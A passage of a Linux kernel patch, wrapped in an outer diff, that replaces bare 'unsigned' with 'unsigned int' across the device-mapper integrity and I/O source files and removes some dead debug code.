+ 		if (unlikely(dio->op == REQ_OP_DISCARD)) {
+-			sector_t bi_sector = dio->bio_details.bi_iter.bi_sector;
+-			unsigned bi_size = dio->bio_details.bi_iter.bi_size;
+-			unsigned max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
+-			unsigned max_blocks = max_size / ic->tag_size;
++			unsigned int bi_size = dio->bio_details.bi_iter.bi_size;
++			unsigned int max_size = likely(checksums != checksums_onstack) ? PAGE_SIZE : HASH_MAX_DIGESTSIZE;
++			unsigned int max_blocks = max_size / ic->tag_size;
+ 			memset(checksums, DISCARD_FILLER, max_size);
+ 
+ 			while (bi_size) {
+-				unsigned this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
++				unsigned int this_step_blocks = bi_size >> (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+ 				this_step_blocks = min(this_step_blocks, max_blocks);
+ 				r = dm_integrity_rw_tag(ic, checksums, &dio->metadata_block, &dio->metadata_offset,
+ 							this_step_blocks * ic->tag_size, TAG_WRITE);
+@@ -1752,13 +1751,7 @@ static void integrity_metadata(struct work_struct *w)
+ 					goto error;
+ 				}
+ 
+-				/*if (bi_size < this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block)) {
+-					printk("BUGG: bi_sector: %llx, bi_size: %u\n", bi_sector, bi_size);
+-					printk("BUGG: this_step_blocks: %u\n", this_step_blocks);
+-					BUG();
+-				}*/
+ 				bi_size -= this_step_blocks << (SECTOR_SHIFT + ic->sb->log2_sectors_per_block);
+-				bi_sector += this_step_blocks << ic->sb->log2_sectors_per_block;
+ 			}
+ 
+ 			if (likely(checksums != checksums_onstack))
+@@ -1770,7 +1763,7 @@ static void integrity_metadata(struct work_struct *w)
+ 		sectors_to_process = dio->range.n_sectors;
+ 
+ 		__bio_for_each_segment(bv, bio, iter, dio->bio_details.bi_iter) {
+-			unsigned pos;
++			unsigned int pos;
+ 			char *mem, *checksums_ptr;
+ 
+ again:
+@@ -1823,13 +1816,13 @@ again:
+ 		if (bip) {
+ 			struct bio_vec biv;
+ 			struct bvec_iter iter;
+-			unsigned data_to_process = dio->range.n_sectors;
++			unsigned int data_to_process = dio->range.n_sectors;
+ 			sector_to_block(ic, data_to_process);
+ 			data_to_process *= ic->tag_size;
+ 
+ 			bip_for_each_vec(biv, bip, iter) {
+ 				unsigned char *tag;
+-				unsigned this_len;
++				unsigned int this_len;
+ 
+ 				BUG_ON(PageHighMem(biv.bv_page));
+ 				tag = bvec_virt(&biv);
+@@ -1867,7 +1860,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	if (unlikely(dio->op == REQ_OP_DISCARD)) {
+ 		if (ti->max_io_len) {
+ 			sector_t sec = dm_target_offset(ti, bio->bi_iter.bi_sector);
+-			unsigned log2_max_io_len = __fls(ti->max_io_len);
++			unsigned int log2_max_io_len = __fls(ti->max_io_len);
+ 			sector_t start_boundary = sec >> log2_max_io_len;
+ 			sector_t end_boundary = (sec + bio_sectors(bio) - 1) >> log2_max_io_len;
+ 			if (start_boundary < end_boundary) {
+@@ -1897,7 +1890,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 		      ic->provided_data_sectors);
+ 		return DM_MAPIO_KILL;
+ 	}
+-	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned)(ic->sectors_per_block - 1))) {
++	if (unlikely((dio->range.logical_sector | bio_sectors(bio)) & (unsigned int)(ic->sectors_per_block - 1))) {
+ 		DMERR("Bio not aligned on %u sectors: 0x%llx, 0x%x",
+ 		      ic->sectors_per_block,
+ 		      dio->range.logical_sector, bio_sectors(bio));
+@@ -1919,7 +1912,7 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ 	bip = bio_integrity(bio);
+ 	if (!ic->internal_hash) {
+ 		if (bip) {
+-			unsigned wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
++			unsigned int wanted_tag_size = bio_sectors(bio) >> ic->sb->log2_sectors_per_block;
+ 			if (ic->log2_tag_size >= 0)
+ 				wanted_tag_size <<= ic->log2_tag_size;
+ 			else
+@@ -1949,11 +1942,11 @@ static int dm_integrity_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static bool __journal_read_write(struct dm_integrity_io *dio, struct bio *bio,
+-				 unsigned journal_section, unsigned journal_entry)
++				 unsigned int journal_section, unsigned int journal_entry)
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	sector_t logical_sector;
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 
+ 	logical_sector = dio->range.logical_sector;
+ 	n_sectors = dio->range.n_sectors;
+@@ -1976,7 +1969,7 @@ retry_kmap:
+ 			if (unlikely(dio->op == REQ_OP_READ)) {
+ 				struct journal_sector *js;
+ 				char *mem_ptr;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				if (unlikely(journal_entry_is_inprogress(je))) {
+ 					flush_dcache_page(bv.bv_page);
+@@ -2013,12 +2006,12 @@ retry_kmap:
+ 
+ 			if (!ic->internal_hash) {
+ 				struct bio_integrity_payload *bip = bio_integrity(bio);
+-				unsigned tag_todo = ic->tag_size;
++				unsigned int tag_todo = ic->tag_size;
+ 				char *tag_ptr = journal_entry_tag(ic, je);
+ 
+ 				if (bip) do {
+ 					struct bio_vec biv = bvec_iter_bvec(bip->bip_vec, bip->bip_iter);
+-					unsigned tag_now = min(biv.bv_len, tag_todo);
++					unsigned int tag_now = min(biv.bv_len, tag_todo);
+ 					char *tag_addr;
+ 					BUG_ON(PageHighMem(biv.bv_page));
+ 					tag_addr = bvec_virt(&biv);
+@@ -2037,7 +2030,7 @@ retry_kmap:
+ 
+ 			if (likely(dio->op == REQ_OP_WRITE)) {
+ 				struct journal_sector *js;
+-				unsigned s;
++				unsigned int s;
+ 
+ 				js = access_journal_data(ic, journal_section, journal_entry);
+ 				memcpy(js, mem + bv.bv_offset, ic->sectors_per_block << SECTOR_SHIFT);
+@@ -2048,7 +2041,7 @@ retry_kmap:
+ 				} while (++s < ic->sectors_per_block);
+ 
+ 				if (ic->internal_hash) {
+-					unsigned digest_size = crypto_shash_digestsize(ic->internal_hash);
++					unsigned int digest_size = crypto_shash_digestsize(ic->internal_hash);
+ 					if (unlikely(digest_size > ic->tag_size)) {
+ 						char checksums_onstack[HASH_MAX_DIGESTSIZE];
+ 						integrity_sector_checksum(ic, logical_sector, (char *)js, checksums_onstack);
+@@ -2105,8 +2098,8 @@ static void dm_integrity_map_continue(struct dm_integrity_io *dio, bool from_map
+ {
+ 	struct dm_integrity_c *ic = dio->ic;
+ 	struct bio *bio = dm_bio_from_per_bio_data(dio, sizeof(struct dm_integrity_io));
+-	unsigned journal_section, journal_entry;
+-	unsigned journal_read_pos;
++	unsigned int journal_section, journal_entry;
++	unsigned int journal_read_pos;
+ 	struct completion read_comp;
+ 	bool discard_retried = false;
+ 	bool need_sync_io = ic->internal_hash && dio->op == REQ_OP_READ;
+@@ -2131,8 +2124,8 @@ retry:
+ 	journal_read_pos = NOT_FOUND;
+ 	if (ic->mode == 'J' && likely(dio->op != REQ_OP_DISCARD)) {
+ 		if (dio->op == REQ_OP_WRITE) {
+-			unsigned next_entry, i, pos;
+-			unsigned ws, we, range_sectors;
++			unsigned int next_entry, i, pos;
++			unsigned int ws, we, range_sectors;
+ 
+ 			dio->range.n_sectors = min(dio->range.n_sectors,
+ 						   (sector_t)ic->free_sectors << ic->sb->log2_sectors_per_block);
+@@ -2185,8 +2178,8 @@ retry:
+ 				if (unlikely(dio->range.n_sectors > next_sector - dio->range.logical_sector))
+ 					dio->range.n_sectors = next_sector - dio->range.logical_sector;
+ 			} else {
+-				unsigned i;
+-				unsigned jp = journal_read_pos + 1;
++				unsigned int i;
++				unsigned int jp = journal_read_pos + 1;
+ 				for (i = ic->sectors_per_block; i < dio->range.n_sectors; i += ic->sectors_per_block, jp++) {
+ 					if (!test_journal_node(ic, jp, dio->range.logical_sector + i))
+ 						break;
+@@ -2218,7 +2211,7 @@ offload_to_thread:
+ 		 */
+ 		if (journal_read_pos != NOT_FOUND) {
+ 			sector_t next_sector;
+-			unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++			unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 			if (unlikely(new_pos != journal_read_pos)) {
+ 				remove_range_unlocked(ic, &dio->range);
+ 				goto retry;
+@@ -2227,7 +2220,7 @@ offload_to_thread:
+ 	}
+ 	if (ic->mode == 'J' && likely(dio->op == REQ_OP_DISCARD) && !discard_retried) {
+ 		sector_t next_sector;
+-		unsigned new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
++		unsigned int new_pos = find_journal_node(ic, dio->range.logical_sector, &next_sector);
+ 		if (unlikely(new_pos != NOT_FOUND) ||
+ 		    unlikely(next_sector < dio->range.logical_sector - dio->range.n_sectors)) {
+ 			remove_range_unlocked(ic, &dio->range);
+@@ -2354,8 +2347,8 @@ static void pad_uncommitted(struct dm_integrity_c *ic)
+ static void integrity_commit(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, commit_work);
+-	unsigned commit_start, commit_sections;
+-	unsigned i, j, n;
++	unsigned int commit_start, commit_sections;
++	unsigned int i, j, n;
+ 	struct bio *flushes;
+ 
+ 	del_timer(&ic->autocommit_timer);
+@@ -2433,17 +2426,17 @@ static void complete_copy_from_journal(unsigned long error, void *context)
+ static void restore_last_bytes(struct dm_integrity_c *ic, struct journal_sector *js,
+ 			       struct journal_entry *je)
+ {
+-	unsigned s = 0;
++	unsigned int s = 0;
+ 	do {
+ 		js->commit_id = je->last_bytes[s];
+ 		js++;
+ 	} while (++s < ic->sectors_per_block);
+ }
+ 
+-static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+-			     unsigned write_sections, bool from_replay)
++static void do_journal_write(struct dm_integrity_c *ic, unsigned int write_start,
++			     unsigned int write_sections, bool from_replay)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 	struct journal_completion comp;
+ 	struct blk_plug plug;
+ 
+@@ -2462,9 +2455,9 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 		for (j = 0; j < ic->journal_section_entries; j++) {
+ 			struct journal_entry *je = access_journal_entry(ic, i, j);
+ 			sector_t sec, area, offset;
+-			unsigned k, l, next_loop;
++			unsigned int k, l, next_loop;
+ 			sector_t metadata_block;
+-			unsigned metadata_offset;
++			unsigned int metadata_offset;
+ 			struct journal_io *io;
+ 
+ 			if (journal_entry_is_unused(je))
+@@ -2472,7 +2465,7 @@ static void do_journal_write(struct dm_integrity_c *ic, unsigned write_start,
+ 			BUG_ON(unlikely(journal_entry_is_inprogress(je)) && !from_replay);
+ 			sec = journal_entry_get_sector(je);
+ 			if (unlikely(from_replay)) {
+-				if (unlikely(sec & (unsigned)(ic->sectors_per_block - 1))) {
++				if (unlikely(sec & (unsigned int)(ic->sectors_per_block - 1))) {
+ 					dm_integrity_io_error(ic, "invalid sector in journal", -EIO);
+ 					sec &= ~(sector_t)(ic->sectors_per_block - 1);
+ 				}
+@@ -2590,9 +2583,9 @@ skip_io:
+ static void integrity_writer(struct work_struct *w)
+ {
+ 	struct dm_integrity_c *ic = container_of(w, struct dm_integrity_c, writer_work);
+-	unsigned write_start, write_sections;
++	unsigned int write_start, write_sections;
+ 
+-	unsigned prev_free_sectors;
++	unsigned int prev_free_sectors;
+ 
+ 	spin_lock_irq(&ic->endio_wait.lock);
+ 	write_start = ic->committed_section;
+@@ -2639,12 +2632,12 @@ static void integrity_recalc(struct work_struct *w)
+ 	struct dm_io_region io_loc;
+ 	sector_t area, offset;
+ 	sector_t metadata_block;
+-	unsigned metadata_offset;
++	unsigned int metadata_offset;
+ 	sector_t logical_sector, n_sectors;
+ 	__u8 *t;
+-	unsigned i;
++	unsigned int i;
+ 	int r;
+-	unsigned super_counter = 0;
++	unsigned int super_counter = 0;
+ 
+ 	DEBUG_print("start recalculation... (position %llx)\n", le64_to_cpu(ic->sb->recalc_sector));
+ 
+@@ -2668,7 +2661,7 @@ next_chunk:
+ 	get_area_and_offset(ic, range.logical_sector, &area, &offset);
+ 	range.n_sectors = min((sector_t)RECALC_SECTORS, ic->provided_data_sectors - range.logical_sector);
+ 	if (!ic->meta_dev)
+-		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned)offset);
++		range.n_sectors = min(range.n_sectors, ((sector_t)1U << ic->sb->log2_interleave_sectors) - (unsigned int)offset);
+ 
+ 	add_new_range_and_wait(ic, &range);
+ 	spin_unlock_irq(&ic->endio_wait.lock);
+@@ -2859,10 +2852,10 @@ static void bitmap_flush_work(struct work_struct *work)
+ }
+ 
+ 
+-static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+-			 unsigned n_sections, unsigned char commit_seq)
++static void init_journal(struct dm_integrity_c *ic, unsigned int start_section,
++			 unsigned int n_sections, unsigned char commit_seq)
+ {
+-	unsigned i, j, n;
++	unsigned int i, j, n;
+ 
+ 	if (!n_sections)
+ 		return;
+@@ -2885,7 +2878,7 @@ static void init_journal(struct dm_integrity_c *ic, unsigned start_section,
+ 	write_journal(ic, start_section, n_sections);
+ }
+ 
+-static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, commit_id_t id)
++static int find_commit_seq(struct dm_integrity_c *ic, unsigned int i, unsigned int j, commit_id_t id)
+ {
+ 	unsigned char k;
+ 	for (k = 0; k < N_COMMIT_IDS; k++) {
+@@ -2898,11 +2891,11 @@ static int find_commit_seq(struct dm_integrity_c *ic, unsigned i, unsigned j, co
+ 
+ static void replay_journal(struct dm_integrity_c *ic)
+ {
+-	unsigned i, j;
++	unsigned int i, j;
+ 	bool used_commit_ids[N_COMMIT_IDS];
+-	unsigned max_commit_id_sections[N_COMMIT_IDS];
+-	unsigned write_start, write_sections;
+-	unsigned continue_section;
++	unsigned int max_commit_id_sections[N_COMMIT_IDS];
++	unsigned int write_start, write_sections;
++	unsigned int continue_section;
+ 	bool journal_empty;
+ 	unsigned char unused, last_used, want_commit_seq;
+ 
+@@ -3020,7 +3013,7 @@ brk:
+ 		ic->commit_seq = want_commit_seq;
+ 		DEBUG_print("continuing from section %u, commit seq %d\n", write_start, ic->commit_seq);
+ 	} else {
+-		unsigned s;
++		unsigned int s;
+ 		unsigned char erase_seq;
+ clear_journal:
+ 		DEBUG_print("clearing journal\n");
+@@ -3252,10 +3245,10 @@ static void dm_integrity_resume(struct dm_target *ti)
+ }
+ 
+ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+-				unsigned status_flags, char *result, unsigned maxlen)
++				unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct dm_integrity_c *ic = (struct dm_integrity_c *)ti->private;
+-	unsigned arg_count;
++	unsigned int arg_count;
+ 	size_t sz = 0;
+ 
+ 	switch (type) {
+@@ -3305,7 +3298,7 @@ static void dm_integrity_status(struct dm_target *ti, status_type_t type,
+ 		DMEMIT(" interleave_sectors:%u", 1U << ic->sb->log2_interleave_sectors);
+ 		DMEMIT(" buffer_sectors:%u", 1U << ic->log2_buffer_sectors);
+ 		if (ic->mode == 'J') {
+-			DMEMIT(" journal_watermark:%u", (unsigned)watermark_percentage);
++			DMEMIT(" journal_watermark:%u", (unsigned int)watermark_percentage);
+ 			DMEMIT(" commit_time:%u", ic->autocommit_msec);
+ 		}
+ 		if (ic->mode == 'B') {
+@@ -3384,7 +3377,7 @@ static void dm_integrity_io_hints(struct dm_target *ti, struct queue_limits *lim
+ 
+ static void calculate_journal_section_size(struct dm_integrity_c *ic)
+ {
+-	unsigned sector_space = JOURNAL_SECTOR_DATA;
++	unsigned int sector_space = JOURNAL_SECTOR_DATA;
+ 
+ 	ic->journal_sections = le32_to_cpu(ic->sb->journal_sections);
+ 	ic->journal_entry_size = roundup(offsetof(struct journal_entry, last_bytes[ic->sectors_per_block]) + ic->tag_size,
+@@ -3461,9 +3454,10 @@ static void get_provided_data_sectors(struct dm_integrity_c *ic)
+ 	}
+ }
+ 
+-static int initialize_superblock(struct dm_integrity_c *ic, unsigned journal_sectors, unsigned interleave_sectors)
++static int initialize_superblock(struct dm_integrity_c *ic,
++				 unsigned int journal_sectors, unsigned int interleave_sectors)
+ {
+-	unsigned journal_sections;
++	unsigned int journal_sections;
+ 	int test_bit;
+ 
+ 	memset(ic->sb, 0, SB_SECTORS << SECTOR_SHIFT);
+@@ -3548,7 +3542,7 @@ static void dm_integrity_set(struct dm_target *ti, struct dm_integrity_c *ic)
+ 
+ static void dm_integrity_free_page_list(struct page_list *pl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!pl)
+ 		return;
+@@ -3557,10 +3551,10 @@ static void dm_integrity_free_page_list(struct page_list *pl)
+ 	kvfree(pl);
+ }
+ 
+-static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
++static struct page_list *dm_integrity_alloc_page_list(unsigned int n_pages)
+ {
+ 	struct page_list *pl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	pl = kvmalloc_array(n_pages + 1, sizeof(struct page_list), GFP_KERNEL | __GFP_ZERO);
+ 	if (!pl)
+@@ -3583,7 +3577,7 @@ static struct page_list *dm_integrity_alloc_page_list(unsigned n_pages)
+ 
+ static void dm_integrity_free_journal_scatterlist(struct dm_integrity_c *ic, struct scatterlist **sl)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < ic->journal_sections; i++)
+ 		kvfree(sl[i]);
+ 	kvfree(sl);
+@@ -3593,7 +3587,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 								   struct page_list *pl)
+ {
+ 	struct scatterlist **sl;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	sl = kvmalloc_array(ic->journal_sections,
+ 			    sizeof(struct scatterlist *),
+@@ -3603,10 +3597,10 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 
+ 	for (i = 0; i < ic->journal_sections; i++) {
+ 		struct scatterlist *s;
+-		unsigned start_index, start_offset;
+-		unsigned end_index, end_offset;
+-		unsigned n_pages;
+-		unsigned idx;
++		unsigned int start_index, start_offset;
++		unsigned int end_index, end_offset;
++		unsigned int n_pages;
++		unsigned int idx;
+ 
+ 		page_list_location(ic, i, 0, &start_index, &start_offset);
+ 		page_list_location(ic, i, ic->journal_section_sectors - 1,
+@@ -3624,7 +3618,7 @@ static struct scatterlist **dm_integrity_alloc_journal_scatterlist(struct dm_int
+ 		sg_init_table(s, n_pages);
+ 		for (idx = start_index; idx <= end_index; idx++) {
+ 			char *va = lowmem_page_address(pl[idx].page);
+-			unsigned start = 0, end = PAGE_SIZE;
++			unsigned int start = 0, end = PAGE_SIZE;
+ 			if (idx == start_index)
+ 				start = start_offset;
+ 			if (idx == end_index)
+@@ -3711,7 +3705,7 @@ static int get_mac(struct crypto_shash **hash, struct alg_spec *a, char **error,
+ static int create_journal(struct dm_integrity_c *ic, char **error)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	__u64 journal_pages, journal_desc_size, journal_tree_size;
+ 	unsigned char *crypt_data = NULL, *crypt_iv = NULL;
+ 	struct skcipher_request *req = NULL;
+@@ -3738,7 +3732,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 		goto bad;
+ 	}
+ 	if (ic->journal_crypt_alg.alg_string) {
+-		unsigned ivsize, blocksize;
++		unsigned int ivsize, blocksize;
+ 		struct journal_completion comp;
+ 
+ 		comp.ic = ic;
+@@ -3827,7 +3821,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 			crypto_free_skcipher(ic->journal_crypt);
+ 			ic->journal_crypt = NULL;
+ 		} else {
+-			unsigned crypt_len = roundup(ivsize, blocksize);
++			unsigned int crypt_len = roundup(ivsize, blocksize);
+ 
+ 			req = skcipher_request_alloc(ic->journal_crypt, GFP_KERNEL);
+ 			if (!req) {
+@@ -3915,7 +3909,7 @@ static int create_journal(struct dm_integrity_c *ic, char **error)
+ 	}
+ 
+ 	for (i = 0; i < N_COMMIT_IDS; i++) {
+-		unsigned j;
++		unsigned int j;
+ retest_commit_id:
+ 		for (j = 0; j < i; j++) {
+ 			if (ic->commit_ids[j] == ic->commit_ids[i]) {
+@@ -3969,17 +3963,17 @@ bad:
+  *		journal_mac
+  *		recalculate
+  */
+-static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int dm_integrity_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	struct dm_integrity_c *ic;
+ 	char dummy;
+ 	int r;
+-	unsigned extra_args;
++	unsigned int extra_args;
+ 	struct dm_arg_set as;
+ 	static const struct dm_arg _args[] = {
+ 		{0, 18, "Invalid number of feature args"},
+ 	};
+-	unsigned journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
++	unsigned int journal_sectors, interleave_sectors, buffer_sectors, journal_watermark, sync_msec;
+ 	bool should_write_sb;
+ 	__u64 threshold;
+ 	unsigned long long start;
+@@ -4058,7 +4052,7 @@ static int dm_integrity_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 
+ 	while (extra_args--) {
+ 		const char *opt_string;
+-		unsigned val;
++		unsigned int val;
+ 		unsigned long long llval;
+ 		opt_string = dm_shift_arg(&as);
+ 		if (!opt_string) {
+@@ -4391,7 +4385,7 @@ try_smaller_buffer:
+ 	DEBUG_print("	journal_entries_per_sector %u\n", ic->journal_entries_per_sector);
+ 	DEBUG_print("	journal_section_entries %u\n", ic->journal_section_entries);
+ 	DEBUG_print("	journal_section_sectors %u\n", ic->journal_section_sectors);
+-	DEBUG_print("	journal_sections %u\n", (unsigned)le32_to_cpu(ic->sb->journal_sections));
++	DEBUG_print("	journal_sections %u\n", (unsigned int)le32_to_cpu(ic->sb->journal_sections));
+ 	DEBUG_print("	journal_entries %u\n", ic->journal_entries);
+ 	DEBUG_print("	log2_interleave_sectors %d\n", ic->sb->log2_interleave_sectors);
+ 	DEBUG_print("	data_device_sectors 0x%llx\n", bdev_nr_sectors(ic->dev->bdev));
+@@ -4465,8 +4459,8 @@ try_smaller_buffer:
+ 	}
+ 
+ 	if (ic->mode == 'B') {
+-		unsigned i;
+-		unsigned n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
++		unsigned int i;
++		unsigned int n_bitmap_pages = DIV_ROUND_UP(ic->n_bitmap_blocks, PAGE_SIZE / BITMAP_BLOCK_SIZE);
+ 
+ 		ic->recalc_bitmap = dm_integrity_alloc_page_list(n_bitmap_pages);
+ 		if (!ic->recalc_bitmap) {
+@@ -4486,7 +4480,7 @@ try_smaller_buffer:
+ 		INIT_DELAYED_WORK(&ic->bitmap_flush_work, bitmap_flush_work);
+ 		for (i = 0; i < ic->n_bitmap_blocks; i++) {
+ 			struct bitmap_block_status *bbs = &ic->bbs[i];
+-			unsigned sector, pl_index, pl_offset;
++			unsigned int sector, pl_index, pl_offset;
+ 
+ 			INIT_WORK(&bbs->work, bitmap_block_work);
+ 			bbs->ic = ic;
+@@ -4523,7 +4517,7 @@ try_smaller_buffer:
+ 			goto bad;
+ 	}
+ 	if (ic->mode == 'B') {
+-		unsigned max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
++		unsigned int max_io_len = ((sector_t)ic->sectors_per_block << ic->log2_blocks_per_bitmap_bit) * (BITMAP_BLOCK_SIZE * 8);
+ 		if (!max_io_len)
+ 			max_io_len = 1U << 31;
+ 		DEBUG_print("max_io_len: old %u, new %u\n", ti->max_io_len, max_io_len);
+@@ -4594,7 +4588,7 @@ static void dm_integrity_dtr(struct dm_target *ti)
+ 	if (ic->journal_io_scatterlist)
+ 		dm_integrity_free_journal_scatterlist(ic, ic->journal_io_scatterlist);
+ 	if (ic->sk_requests) {
+-		unsigned i;
++		unsigned int i;
+ 
+ 		for (i = 0; i < ic->journal_sections; i++) {
+ 			struct skcipher_request *req = ic->sk_requests[i];
+diff --git a/drivers/md/dm-io-rewind.c b/drivers/md/dm-io-rewind.c
+index 0db53ccb94ba7..773c4cff8b89f 100644
+--- a/drivers/md/dm-io-rewind.c
++++ b/drivers/md/dm-io-rewind.c
+@@ -57,7 +57,7 @@ static void dm_bio_integrity_rewind(struct bio *bio, unsigned int bytes_done)
+ {
+ 	struct bio_integrity_payload *bip = bio_integrity(bio);
+ 	struct blk_integrity *bi = blk_get_integrity(bio->bi_bdev->bd_disk);
+-	unsigned bytes = bio_integrity_bytes(bi, bytes_done >> 9);
++	unsigned int bytes = bio_integrity_bytes(bi, bytes_done >> 9);
+ 
+ 	bip->bip_iter.bi_sector -= bio_integrity_intervals(bi, bytes_done >> 9);
+ 	dm_bvec_iter_rewind(bip->bip_vec, &bip->bip_iter, bytes);
+@@ -131,7 +131,7 @@ static inline void dm_bio_rewind_iter(const struct bio *bio,
+  * rewinding from end of bio and restoring its original position.
+  * Caller is also responsibile for restoring bio's size.
+  */
+-static void dm_bio_rewind(struct bio *bio, unsigned bytes)
++static void dm_bio_rewind(struct bio *bio, unsigned int bytes)
+ {
+ 	if (bio_integrity(bio))
+ 		dm_bio_integrity_rewind(bio, bytes);
+diff --git a/drivers/md/dm-io.c b/drivers/md/dm-io.c
+index 7835645334593..e488b05e35fa3 100644
+--- a/drivers/md/dm-io.c
++++ b/drivers/md/dm-io.c
+@@ -48,7 +48,7 @@ static struct kmem_cache *_dm_io_cache;
+ struct dm_io_client *dm_io_client_create(void)
+ {
+ 	struct dm_io_client *client;
+-	unsigned min_ios = dm_get_reserved_bio_based_ios();
++	unsigned int min_ios = dm_get_reserved_bio_based_ios();
+ 	int ret;
+ 
+ 	client = kzalloc(sizeof(*client), GFP_KERNEL);
+@@ -88,7 +88,7 @@ EXPORT_SYMBOL(dm_io_client_destroy);
+  * bi_private.
+  *---------------------------------------------------------------*/
+ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+-				       unsigned region)
++				       unsigned int region)
+ {
+ 	if (unlikely(!IS_ALIGNED((unsigned long)io, DM_IO_MAX_REGIONS))) {
+ 		DMCRIT("Unaligned struct io pointer %p", io);
+@@ -99,7 +99,7 @@ static void store_io_and_region_in_bio(struct bio *bio, struct io *io,
+ }
+ 
+ static void retrieve_io_and_region_from_bio(struct bio *bio, struct io **io,
+-				       unsigned *region)
++				       unsigned int *region)
+ {
+ 	unsigned long val = (unsigned long)bio->bi_private;
+ 
+@@ -137,7 +137,7 @@ static void dec_count(struct io *io, unsigned int region, blk_status_t error)
+ static void endio(struct bio *bio)
+ {
+ 	struct io *io;
+-	unsigned region;
++	unsigned int region;
+ 	blk_status_t error;
+ 
+ 	if (bio->bi_status && bio_data_dir(bio) == READ)
+@@ -160,11 +160,11 @@ static void endio(struct bio *bio)
+  *---------------------------------------------------------------*/
+ struct dpages {
+ 	void (*get_page)(struct dpages *dp,
+-			 struct page **p, unsigned long *len, unsigned *offset);
++			 struct page **p, unsigned long *len, unsigned int *offset);
+ 	void (*next_page)(struct dpages *dp);
+ 
+ 	union {
+-		unsigned context_u;
++		unsigned int context_u;
+ 		struct bvec_iter context_bi;
+ 	};
+ 	void *context_ptr;
+@@ -177,9 +177,9 @@ struct dpages {
+  * Functions for getting the pages from a list.
+  */
+ static void list_get_page(struct dpages *dp,
+-		  struct page **p, unsigned long *len, unsigned *offset)
++		  struct page **p, unsigned long *len, unsigned int *offset)
+ {
+-	unsigned o = dp->context_u;
++	unsigned int o = dp->context_u;
+ 	struct page_list *pl = (struct page_list *) dp->context_ptr;
+ 
+ 	*p = pl->page;
+@@ -194,7 +194,7 @@ static void list_next_page(struct dpages *dp)
+ 	dp->context_u = 0;
+ }
+ 
+-static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offset)
++static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned int offset)
+ {
+ 	dp->get_page = list_get_page;
+ 	dp->next_page = list_next_page;
+@@ -206,7 +206,7 @@ static void list_dp_init(struct dpages *dp, struct page_list *pl, unsigned offse
+  * Functions for getting the pages from a bvec.
+  */
+ static void bio_get_page(struct dpages *dp, struct page **p,
+-			 unsigned long *len, unsigned *offset)
++			 unsigned long *len, unsigned int *offset)
+ {
+ 	struct bio_vec bvec = bvec_iter_bvec((struct bio_vec *)dp->context_ptr,
+ 					     dp->context_bi);
+@@ -244,7 +244,7 @@ static void bio_dp_init(struct dpages *dp, struct bio *bio)
+  * Functions for getting the pages from a VMA.
+  */
+ static void vm_get_page(struct dpages *dp,
+-		 struct page **p, unsigned long *len, unsigned *offset)
++		 struct page **p, unsigned long *len, unsigned int *offset)
+ {
+ 	*p = vmalloc_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -269,7 +269,7 @@ static void vm_dp_init(struct dpages *dp, void *data)
+  * Functions for getting the pages from kernel memory.
+  */
+ static void km_get_page(struct dpages *dp, struct page **p, unsigned long *len,
+-			unsigned *offset)
++			unsigned int *offset)
+ {
+ 	*p = virt_to_page(dp->context_ptr);
+ 	*offset = dp->context_u;
+@@ -293,15 +293,15 @@ static void km_dp_init(struct dpages *dp, void *data)
+ /*-----------------------------------------------------------------
+  * IO routines that accept a list of pages.
+  *---------------------------------------------------------------*/
+-static void do_region(const blk_opf_t opf, unsigned region,
++static void do_region(const blk_opf_t opf, unsigned int region,
+ 		      struct dm_io_region *where, struct dpages *dp,
+ 		      struct io *io)
+ {
+ 	struct bio *bio;
+ 	struct page *page;
+ 	unsigned long len;
+-	unsigned offset;
